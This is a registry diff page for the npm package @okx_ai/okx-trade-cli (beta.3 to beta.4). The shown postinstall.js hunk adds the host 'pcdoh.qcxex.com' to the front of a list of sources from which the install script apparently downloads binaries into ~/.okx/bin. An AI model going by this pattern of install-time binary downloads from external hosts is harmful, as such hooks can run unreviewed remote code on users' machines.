@okx_ai/okx-trade-cli 1.3.0-beta.3 → 1.3.0-beta.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/index.js +922 -203
- package/dist/index.js.map +1 -1
- package/package.json +1 -1
- package/scripts/postinstall.js +3 -2
package/package.json
CHANGED
package/scripts/postinstall.js
CHANGED
|
@@ -28,10 +28,11 @@ try {
|
|
|
28
28
|
// ---------------------------------------------------------------------------
|
|
29
29
|
|
|
30
30
|
const CDN_SOURCES = [
|
|
31
|
+
{ host: 'pcdoh.qcxex.com', protocol: 'https' },
|
|
31
32
|
{ host: 'static.okx.com', protocol: 'https' },
|
|
32
|
-
{ host: 'static.
|
|
33
|
+
{ host: 'static.coinall.ltd', protocol: 'https' },
|
|
33
34
|
];
|
|
34
|
-
const CDN_PATH_PREFIX = '/upgradeapp/doh
|
|
35
|
+
const CDN_PATH_PREFIX = '/upgradeapp/doh';
|
|
35
36
|
const DOWNLOAD_TIMEOUT_MS = 30_000;
|
|
36
37
|
const BIN_DIR = join(homedir(), '.okx', 'bin');
|
|
37
38
|
|